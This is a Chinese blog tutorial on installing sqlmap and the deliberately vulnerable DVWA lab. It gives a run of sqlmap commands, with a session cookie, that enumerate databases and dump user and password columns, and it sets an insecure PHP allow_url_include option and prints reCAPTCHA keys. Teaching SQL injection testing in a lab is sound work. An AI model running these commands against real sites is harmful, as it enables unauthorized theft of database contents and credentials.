sqlmap注入教程linux,Linux Sqlmap检测sql注入漏洞工具安装使用教程

最新推荐文章于 2024-05-15 22:19:08 发布
最新推荐文章于 2024-05-15 22:19:08 发布
阅读量491 收藏 3
点赞数
文章标签: sqlmap注入教程linux

Sqlmap工具

什么是SQLmap?

SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)

sql注入概述:

所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令

它是利用现有应用程序,可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库

比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的,这类表单特别容易受到SQL注入式攻击

安装

官方地址:sqlmap.org

sqlmap1.jpg

下载安全测试环境DVWA

DVWA (Dam Vulnerable Web Application)DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞

官网地址:http://www.dvwa.co.uk/

e1ae9c066580a782daf50a1b24521cc8.png

首先安装python

yum -y install python

python -V

Python 2.7.5

sqlmap安装

sqlmap 的安装比较简单,把源码下载下来然后上传到linux

[root@localhost ]# cd /usr/local/sqlmap

[root@localhost sqlmap]#unzip sqlmapproject-sqlmap-1.3.7-24-g6b88fa3.zip

[root@localhost sqlmap]#cd sqlmapproject-sqlmap-6b88fa3/

[root@localhost sqlmapproject-sqlmap-6b88fa3]# ./sqlmap.py

7ce1d7cf5b67efc66b292c9ea1f306f0.png

设置环境变量

[root@localhost ~]# vim /etc/profile

alias sqlmap='python /usr/local/sqlmap/sqlmapproject-sqlmap-6b88fa3/sqlmap.py'

[root@localhost ~]# source /etc/profile

安装渗透测试演练系统DVWA

[root@localhost ~]# yum install -y httpd mysql-server mysql php php-mysql php-gd

[root@localhost ~]# service start httpd

[root@localhost ~]#service mysqld  start

vim /var/www/html/1.php

a0574b4ad3afa6ffd1240f232cb9e4bf.png

配置mysql数据root用户密码

[root@localhost ~]# mysqladmin -u root password "123456"

[root@localhost ~]#  mysql -u root -p123456

解压缩DVWA-master.zip

[root@localhost ~]# unzip DVWA-master.zip -d /var/www/html/

[root@localhost ~]# chown -R apache.apache /var/www/html/DVWA-master/

编辑/dvwa/config/config.inc.php

[root@localhost ~]#  cp /var/www/html/DVWA-master/config/config.inc.php{.dist,}

[root@localhost ~]# vim /var/www/html/DVWA-master/config/config.inc.php

$_DVWA = array();

$_DVWA[ 'db_server' ]   = 'localhost';

$_DVWA[ 'db_database' ] = 'dvwa';

$_DVWA[ 'db_user' ]     = 'root';

$_DVWA[ 'db_password' ] = '123456';#只需要修改成你的mysql的root用户密码

vim /etc/php.ini

allow_url_include = On

service httpd restart

访问浏览器

ad67d11d013327efc6d0baca9fbd83da.png

reCAPTCHA概述:

CMU设计了一个名叫reCAPTCHA的强大系统,让他们的电脑去向人类求助。具体做法是:将OCR软件无法识别的文字扫描图传给世界各大网站,用以替换原来的验证码图片;那些网站的用户在正确识别出这些文字之后,其答案便会被传回CMU

需要去 https://www.google.com/recaptcha 注册

e499397c6a36569adfb5229e554fb15f.png

7402b0b3c71c31d9d8603a810dfdfd2c.png

[root@localhost ~]# vim /var/www/html/DVWA-master/config/config.inc.php

$_DVWA[ 'recaptcha_public_key' ]  = '6Lcz4a0UAAAAADhNAikah_zzlVTe53hDzIl-s69W';

$_DVWA[ 'recaptcha_private_key' ] = '6Lcz4a0UAAAAAMTabebYmhoNK5e1wEwLvQo2EnKH';

service httpd restart

99f91351fa86a5864b1848d5489c9d46.png

dvwa的登录界面的默认用户名和密码为admin和password

SQLmap探测sql注入漏洞 :

7d67c58c60e6d6455ee056a326d45ee6.png

79b7e52e8affab0d87f9f55c71f7a57c.png

提取cookie码

ff3b954bd905e1d0c1435dc48adfc209.png

Sqlmap常用参数

判断注入

Python sqlmap.py http://URL -v 3

数据库

Python sqlmap.py http://URL --dbs -v 3

Python sqlmap.py http://URL --current-user -v 3

表名

Python sqlmap.py http://URL --tables -D 数据库名 -v 3

字段名

Python sqlmap.py http://URL --column -T 表名 -D 数据库名 -v 3

内容

Python sqlmap.py  http://URL --dump -T 表名 -C 字段名 -D 数据库名 -v 3

DVWA测试环境加了cookie

命令改动

1.数据库

sqlmap -u "http://192.168.6.142/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=1oq4a2d8e2u27bhjs9t344t652' -b --dbs -v 3

2.获取当前用户

sqlmap -u "http://192.168.6.142/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=1oq4a2d8e2u27bhjs9t344t652' -b --current-user -v 3

3.表名

sqlmap -u "http://192.168.6.142/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=1oq4a2d8e2u27bhjs9t344t652' -b --tables -D 数据库名 -v 3

4.字段名

sqlmap -u "http://192.168.6.142/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=1oq4a2d8e2u27bhjs9t344t652' -b --column -T 表名  -D 数据库名 -v 3

5.内容

sqlmap -u "http://192.168.6.142/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie='security=low; PHPSESSID=1oq4a2d8e2u27bhjs9t344t652' -b --dump -T 表名 -C 字段名  -D 数据库名 -v 3

6.提取表中用户与密码信息

sqlmap -u "http://192.168.6.142/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#" -D dvwa -T users -C user,password –dump

7.数据库中的表

sqlmap -u "http://192.168.6.142/DVWA-master/vulnerabilities/sqli/?id=22&Submit=Submit#" -D dvwa –tables

--cookie

设置我们的cookie值“将DVWA安全等级从high设置为low”

-u

指定目标URL,syql注入点

-b

获取DBMS banner(DBMS:Database Management System数据库管理系统)

--current-db

获取当前数据库

--current-user

获取当前用户

--string

当查询可用时用来匹配页面中的字符串

--users

枚举DBMS用户

--password

枚举DBMS用户密码hash

--dbs

枚举DBMS中的所有数据库

-D

要枚举的DBMS数据库

--tables

枚举DBMS数据库中的数据表

-T

要枚举的DBMS数据库表

--columns

枚举DBMS数据库表中的所有列

-C

要枚举的DBMS数据表中的列

--dump

转储DBMS数据表项

妮可蹦蹦
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入之——sqlmap教程
JieDG的博客
05-16 368
一、指定注入点 -u:指定注入点url 需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下: C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch 二、暴库 一条命令即可曝出该sqlserver中所有数据库名称,命令如下: C:\Python27\sqlmap>python sqlmap.py -u "http://
sqlmap注入实战教程(图文详解)
weixin_49071539的博客
12-18 2万+
教程使用靶场实战演示,仅供学习未经授权切勿用于非法用途 ! 1.发现此网址可能存在sql注入漏洞,我们进行sql注入测试一下是否存在漏洞。 地址栏输入 and 1=1 发现页面正常显示。 再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞 2.现在拿出我们的kali工具sqlmap进行注入测试。 sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs 3.可以看到存在注入漏洞,扫到了5个数据库。要获.
sqlmap注入使用教程
热门推荐
黑面狐
09-05 8万+
最近在学习SQL注入的东西。自己搭建了一个wavsep靶机,作为练习的对象,之后有空会写一个wavsep的教程。 首先下载安装sqlmap..github传送门:https://github.com/sqlmapproject/sqlmap/releases 一、sqlmap选项   目标:至少要选中一个参数     -u URL, --url=URL   目标为 URL (例如. "ht
SQL注入sqlmap使用教程(超详细)
最新发布
MateSnake的博客
05-15 947
SQL注入sqlmap使用教程(超详细)
sqlmap注入工具----一次简单的注入(实战)
weixin_33675507的博客
08-20 715
最近在学习网络安全,挖洞避免不了要使用许多工具,使用著名注入工具sqlmap的时候,对于英语不怎么好的我就比较难受了,本来就不会使用,加之又是英语的,简直难受。上网找了好多详细教程,但是命令实在是太多,感觉自己不可能一下就全部学会,于是决定一点一点慢慢来,用实战来慢慢熟悉这个工具的使用-----我相信通过每一次的记录我会慢慢变强! 这是墨者学院一个SQL注入漏洞靶场:http://219....
SQLmap注入教程
明哥哥知识分享
08-14 849
一次sqlmap注入点并且dump出账号密码全程 判断注入点:sqlmap.py -u “存在注入url” 爆出所有数据库名字:sqlmap.py -u “存在注入url” --dbs 查看当前使用账号:sqlmap.py -u “存在注入url” --current-user 1、查看当前数据库:sqlmap.py -u “存在注入url” --current-db 2、列出数据库中所有表:sqlmap.py -u “存在注入url”-D “当前数据库名” --tables。解释说明:-D是指定数据库
SQL注入漏洞检测工具sqlmap用户手册
09-16
SQLmap是应对这种威胁的一款强大的自动化工具,由Python编写,旨在帮助安全专家和渗透测试人员检测和利用SQL注入漏洞。本手册将深入探讨sqlmap的使用方法及其核心功能。 一、SQLmap安装与配置 SQLmap可在多种操作...
kali linuxsqlmap注入ACCESS数据库.doc
03-04
Kali Linux 作为一个基于 Debian 的 Linux 发行版,广泛应用于渗透测试和安全评估中,而 SQLmap 则是一个开源的自动化 SQL 注入工具,旨在检测和利用 SQL 注入漏洞。下面我们将详细介绍如何使用 Kali Linux 下的 ...
SQLMAP注入使用
05-13
sqlmap可以多平台运行,windows,linux下都可以进行access,mysql,mssql等数据库的注入,更重要的是sqlmap是一款开源的工具SQLMAP注入命令详解: 1. python SQLMAP.py -u "xxxxxxx.com"【查询链接是否存在...
详解强大的SQL注入工具——SQLMAP
05-09
SQLMAP是一个开源的渗透测试工具,专门用于自动探测和利用SQL注入漏洞SQLMAP不仅可以在Windows平台上使用,同时也支持Linux平台,它的设计目标是为了帮助数据库管理员(DBA)和安全研究人员检测数据库配置的安全性...
SQLmap注入获取Webshell及系统权限研究.pdf
06-08
`SQLmap`是一款开源工具,专门用于自动化地发现并利用SQL注入漏洞,进而获取数据库内容乃至服务器权限。本文将重点介绍如何使用`SQLmap`进行Webshell获取以及系统权限升级,通过具体命令和步骤,帮助读者深入理解这...
SQL注入sqlmap入门教程
m0_56634355的博客
04-09 9102
sqlmapsql注入必备的也是最常用的工具,是每一位白帽子在的利器之一。
SQL注入Sqlmap使用指南(手把手保姆版)持续更新
开水的博客
03-15 2万+
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
sqlmap使用详解
alohai的博客
06-03 431
最近需要使用sqlmap工具,在此将学习记录记录下来。 一、参数选项 1、选项: -h, --help 显示基本帮助信息并退出 -hh 显示高级帮助信息并退出 --version 显示程序的版本号并退出 -v VERBOSE 详细级别:0-6(默认为 1) 2、目标: 必须至少提供这些选项之一来定义 -u URL, --url=URL 目标 URL(例如“http://www.site.com/vuln.php?id=1”) -d DIRECT 用于直接数据库连接的连接字符串 -l LOGF
使用SQLmap进行注入流程
weixin_62715196的博客
08-10 2879
主要讲述SQLmap的主要功能以及对单个目标如何进行注入
掌握SQL注入利器:SQLMap使用入门教程及技巧分享
分享Python知识
08-07 544
掌握SQL注入利器:SQLMap使用入门教程及技巧分享
SQL注入--利用sqlmap工具注入
weixin_52151447的博客
11-18 2312
1、判断是否注入,进入cmd输入sqlmap.py -u
Linux 环境安装运行Sqlmap
weixin_30299539的博客
04-03 526
1、官网下载 .tar.gz 文件 官网地址:http://sqlmap.org/ 2、登录访问linux环境,将压缩包放入/usr/local 路径。 3、在该路径下通过 tar -xzvf filename.tar.gz 解压文件。 4、 mvfilename.tar.gz newname 修改解压后的文件名称。(mv a b) 5、进入newname 路径,使用 ./s...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值